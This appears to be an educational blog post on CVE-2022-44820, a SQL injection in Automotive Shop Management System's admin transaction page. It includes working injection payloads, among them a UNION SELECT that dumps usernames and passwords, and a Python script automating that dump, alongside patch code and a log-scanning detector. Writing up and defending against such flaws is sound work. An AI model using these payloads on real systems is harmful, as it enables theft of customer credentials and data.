Automotive Shop Management System v1. is a web application used by many mechanics and auto shops to handle jobs, orders, inventory, and billing. In 2022, a critical vulnerability (CVE-2022-44820) was found in its admin interface. The flaw lets attackers tamper with the database via SQL injection, putting customer data, orders, and the entire application at risk.
In this post, I'll explain what CVE-2022-44820 is, walk through exploiting it, and give you direct code snippets so you can test or patch your own systems. No security jargon—just clear, real-world advice.
- Product: Automotive Shop Management System v1.
- Path: /asms/admin/?page=transactions/manage_transaction&id=
- Risk: Full database dump (read/change/delete data), possible remote code execution
By editing the id parameter in the URL, an attacker can inject SQL commands directly into database queries. This means your shop's invoices and client info could be stolen or replaced.
Where’s the Original Info?
- NVD - CVE-2022-44820
- Exploit-DB Advisory: 51410
- GitHub Disclosure
The vulnerable code in manage_transaction.php looks like this:

```php
<?php
$id = $_GET['id'];
$query = "SELECT * FROM transactions WHERE id = $id";
$result = mysqli_query($conn, $query);
```
Notice there is no input sanitization—whatever is in id goes straight to the database. Classic, dangerous SQL injection.
Step-by-Step Exploit
Let’s see how an attacker could exploit this using a browser and Burp Suite or the command line.
Just open a browser and go to:
http://[target]/asms/admin/?page=transactions/manage_transaction&id=1
If you see a legit transaction, great. The exploit is about to get real.
Try changing the id parameter like this:
http://[target]/asms/admin/?page=transactions/manage_transaction&id=1%20OR%201=1
1 OR 1=1 is always true. If you suddenly see *all* transactions, the app is vulnerable!
3. Extract Sensitive Data
Now, let's get creative and try to extract usernames or passwords. This assumes the users table has a column called username. Use the following injection:
-1 UNION SELECT 1, username, password, 4, 5, 6 FROM users--
Encoded in the URL:
http://[target]/asms/admin/?page=transactions/manage_transaction&id=-1%20UNION%20SELECT%201,username,password,4,5,6%20FROM%20users--
The UNION appends a second SELECT to the original query, so the usernames and passwords (hashed or, in the worst case, plain text) come back in place of transaction data.
Note: You may need to adjust the number of columns to match the database table.
Example Python Script (for Automated Exploitation)
```python
import requests

TARGET = "http://[target]/asms/admin/?page=transactions/manage_transaction&id="
payload = "-1 UNION SELECT 1, username, password, 4, 5, 6 FROM users--"
url = TARGET + requests.utils.quote(payload)
response = requests.get(url)
print(response.text)
```
1. Use Prepared Statements
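Protect queries by passing user input as bound parameters instead of concatenating it into the SQL string.

```php
$id = $_GET['id'];
// The ? placeholder keeps the value out of the SQL text entirely
$stmt = $conn->prepare("SELECT * FROM transactions WHERE id = ?");
// "i" binds the value as an integer
$stmt->bind_param("i", $id);
$stmt->execute();
$result = $stmt->get_result();
```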
Make sure id is always an integer.

```php
$id = intval($_GET['id']);
```
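To check whether this endpoint has already been probed, the following added example (not part of the original advisory or the application's code) scans web server access logs for requests to the vulnerable page whose id is not a plain integer. It assumes the Apache/Nginx combined log format; the function name, sample log lines and client addresses are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Page name taken from the advisory path; everything else here is illustrative.
VULN_PAGE = "transactions/manage_transaction"
# Assumption: combined log format -> client, timestamp, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "[A-Z]+ (\S+) [^"]*" (\d{3})')

# Constructed sample lines (documentation-range client addresses).
SAMPLE_LOG = [
    '192.0.2.10 - - [18/Nov/2022:10:01:12 +0000] '
    '"GET /asms/admin/?page=transactions/manage_transaction&id=7 HTTP/1.1" 200 5120',
    '198.51.100.23 - - [18/Nov/2022:10:04:40 +0000] '
    '"GET /asms/admin/?page=transactions/manage_transaction&id=1%20OR%201=1 HTTP/1.1" 200 48211',
    '198.51.100.23 - - [18/Nov/2022:10:05:02 +0000] '
    '"GET /asms/admin/?page=transactions/manage_transaction'
    '&id=-1%20UNION%20SELECT%201,username,password,4,5,6%20FROM%20users-- HTTP/1.1" 200 6034',
    '192.0.2.10 - - [18/Nov/2022:10:06:30 +0000] '
    '"GET /asms/admin/?page=home&id=abc HTTP/1.1" 200 900',
]

def suspicious_ids(log_lines):
    """Return (client, timestamp, decoded id, status) for each request to the
    vulnerable page whose id parameter is not a plain non-negative integer."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        client, ts, target, status = m.groups()
        # parse_qs percent-decodes, so %20-encoded values are compared in clear
        params = parse_qs(urlsplit(target).query)
        if VULN_PAGE not in params.get("page", []):
            continue  # a different admin page, out of scope for this CVE
        for value in params.get("id", []):
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((client, ts, value, int(status)))
    return hits

if __name__ == "__main__":
    for client, ts, value, status in suspicious_ids(SAMPLE_LOG):
        print(f"{ts} {client} status={status} id={value!r}")
```

Any hit with a 200 status is worth following up in the database and application logs, since the request reached the vulnerable query.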
Conclusion
CVE-2022-44820 is a simple, dangerous SQL injection in Automotive Shop Management System v1.. If you’re running this software, check your URLs and apply the patch immediately. A single request with malicious input could expose all your customer data.
- Want to see what’s fixed? Check for an official patch.
- More details: Exploit-DB 51410
Stay safe, patch often, and always validate your input!
*This post is original content written for educational purposes. Please do not use this information to attack systems without permission.*
Timeline
Published on: 11/18/2022 19:15:00 UTC
Last modified on: 11/20/2022 07:39:00 UTC